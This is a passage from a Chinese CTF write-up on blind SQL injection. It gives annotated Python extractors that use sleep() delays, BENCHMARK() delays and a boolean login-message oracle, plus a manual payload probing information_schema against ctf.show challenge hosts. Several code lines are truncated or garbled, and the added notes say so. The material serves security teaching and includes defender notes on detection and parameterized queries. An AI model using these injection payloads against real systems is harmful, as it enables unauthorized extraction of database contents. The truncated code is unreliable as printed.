八、延时注入
8.2 脚本
# CTF write-up script: time-based blind SQL injection, recovering a query result
# one character at a time.
# Not runnable as printed: the `url` literal and the `'id'` f-string below are
# truncated by extraction, and the `//…` lines look like `#` comments whose
# marker was garbled (`//` is floor division, not a comment marker, in Python).
# Indentation was lost in the paste and is reconstructed here — verify the loop
# nesting against the original before relying on it.
# What the visible code does: for each position i it bisects the printable ASCII
# range 32..127; every probe POSTs `id` = if(ascii(substr((<payload>),i,1))>mid,
# sleep(0.02), 1) with a 0.4 s client timeout, so a request that times out raises
# in requests.post and is read as "character > mid".
# NOTE(defender): the observable signature is a burst of near-identical POSTs whose
# parameter carries if()/substr()/sleep() and whose latency flips between fast and
# timed-out — about seven requests per recovered character (log2 of a 95-value
# range). Parameterized queries remove the injection point; request-latency
# anomaly rules and WAF signatures on sleep()/benchmark() catch the probing.
import requests
from time import *   # brings Python's sleep() into scope (used between probes below)
url = "http://7e84a93e-e72e-4fa2-947c-1464bdaf9211.challenge.ctf.show:8080/a
flag = ''
i=0  # 1-based character position into the query result; incremented before use
while True:
    i=i+1
    header = 32 //定义ascii可见字符开始值
    tail = 127 // 定义最后的ascii值
    # Binary search over [header, tail): when it ends, `header` is the smallest
    # value the oracle never reported as "greater than".
    while header < tail:
        mid = (header + tail) >> 1 //求出中间值
        payload = "right((select flag from ctfshow_web.flag),20)"// 构造的sql语
        //payload = "select database()" //cvfshow_web
        //payload = "select group_concat(table_name) from information_schema.
        //payload = "select group_concat(column_name) from information_schema
        //print(payload)
        data = {
        //利用substr函数截取查询结果后的字符转换成ascii码,如果大于中间值,睡0.
        'id': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.02),1)
        }
        try:
            # A response within 0.4 s means the sleep() branch did not fire.
            s = requests.post(url, data=data, timeout=0.4)//根据正确执行的次数,
            //print(s.text)
            tail = mid //没有报错执行这句,说明payload语句没有正确执行,没有延时,根
        except Exception as e:
            # Any exception (timeout included) is treated as "delayed", so a
            # transient network error is indistinguishable from a true branch;
            # `e` is never inspected.
            header = mid + 1// 正确的情况,会延时
        sleep(0.4)  # Python time.sleep, distinct from the SQL sleep() in the payload
    # Converging on the lower bound (32) is taken to mean "no character here".
    if header != 32:
        flag+=chr(header)
    else:
        break
    print(flag)
sleep(2)  # placement relative to the outer loop is not recoverable from the paste
8.3 过滤sleep的盲注
MySQL有一个内置的BENCHMARK()函数,可以测试某些特定操作的执行速度。参数可以是需要执行的次数和表达式。表达式可以是任何的标量表达式,比如返回值是标量的子查询或者函数。该函数可以很方便地测试某些特定操作的性能,比如通过测试可以发现,MD5()函数比SHA1()函数要快。
对应脚本:
# CTF write-up script: same bisection extractor as the previous section, but the
# delay is produced with BENCHMARK() instead of sleep() (the section heading says
# sleep is filtered on this target).
# Not runnable as printed: the `url` literal and the `'ip'` f-string are truncated
# by extraction (the `benchmar…` call is cut off), and the `//…` lines look like
# `#` comments whose marker was garbled. Indentation is reconstructed — verify
# the nesting against the original.
# Visible mechanism: the `ip` value starts with `1) or`, i.e. it closes a
# parenthesis in the server-side query before appending the conditional; a
# probe that exceeds the 1 s timeout raises and is read as "character > mid".
# Unlike the sleep() variant there is no pause between probes.
# NOTE(defender): BENCHMARK()-driven probing burns server CPU per request rather
# than idling, so it shows up as CPU spikes correlated with a burst of POSTs to one
# endpoint; the remediation is the same — parameterized queries — and blocking
# sleep() alone, as this section demonstrates, is not a sufficient filter.
import requests
url = "http://2e14a567-cf3b-49a8-9297-a6c19c2357db.challenge.ctf.show:8080/a
flag = ''
i=0  # 1-based character position; incremented before use
while True:
    i=i+1
    header = 32   # lower bound of the bisection (printable ASCII)
    tail = 127    # upper bound
    # Binary search; ends with `header` = smallest value never reported as "greater".
    while header < tail:
        mid = (header + tail) >> 1
        payload = "select flagaabc from ctfshow_web.ctfshow_flagxccb"
        //payload = "select database()"
        //payload = "select group_concat(column_name) from information_schema
        //payload = "select group_concat(table_name) from information_schema.
        //print(payload)
        data = {
        'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmar
        'debug': '0'
        }
        try:
            # Returning within 1 s means the BENCHMARK() branch did not run.
            s = requests.post(url, data=data, timeout=1)
            //print(s.text)
            tail = mid
        except Exception as e:
            # Timeout (or any other exception — `e` is unused) is read as "delayed".
            header = mid + 1
    # Converging on 32 is taken as end-of-string.
    if header != 32:
        flag+=chr(header)
    else:
        break
    print(flag)
九、regexp 正则匹配
测试:
9.1 手动
?id=1' and if(substr((select group_concat(table_name) from information_schem
// 同时爆破 数字 a 和 字母 b
9.2 脚本
# CTF write-up script: boolean-based blind extraction. The oracle is not timing
# but the JSON `msg` field — a "密码错误" (wrong password) reply means the injected
# condition was true and the guessed character `j` is correct at position i.
# Not runnable as printed: `url` is a placeholder and the `payload` f-string is
# truncated by extraction, so the exact condition (the section heading suggests a
# regexp match, the visible text shows substr) cannot be confirmed here. The `//…`
# lines look like garbled `#` comments. Indentation is reconstructed — verify.
# Caveats visible in the code: the candidate alphabet is only " _{}-", lowercase
# and digits, so any other character can never match; when no candidate matches
# at a position the inner loop simply finishes and i advances, silently dropping
# that position; and there is no timeout on the POST, so a hung request blocks forever.
# NOTE(defender): this variant issues up to len(flagstr) (~43) requests per
# character, all with the same `username` prefix and `password` '1' — a
# high-rate burst of failed logins with SQL in the username field, which login
# rate-limiting and input-type logging would surface even without a WAF.
import requests
import string
url = "http://xxxxx"
flagstr=" _{}-" + string.ascii_lowercase + string.digits   # candidate characters, tried in this order
flag = ''
for i in range(1,45):   # positions 1..44 of the query result
    for j in flagstr:
        //payload = f"admin' and if(substr((select group_concat(table_name) f
        //payload = f"admin' and if(substr((select group_concat(column_name)
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctf
        data = {
        'username': payload, 'password': '1'
        }
        r = requests.post(url, data=data)   # no timeout; raises on non-JSON body via r.json()
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:   # closing brace ends the flag
                exit(0)
            break   # first matching candidate wins; move to the next position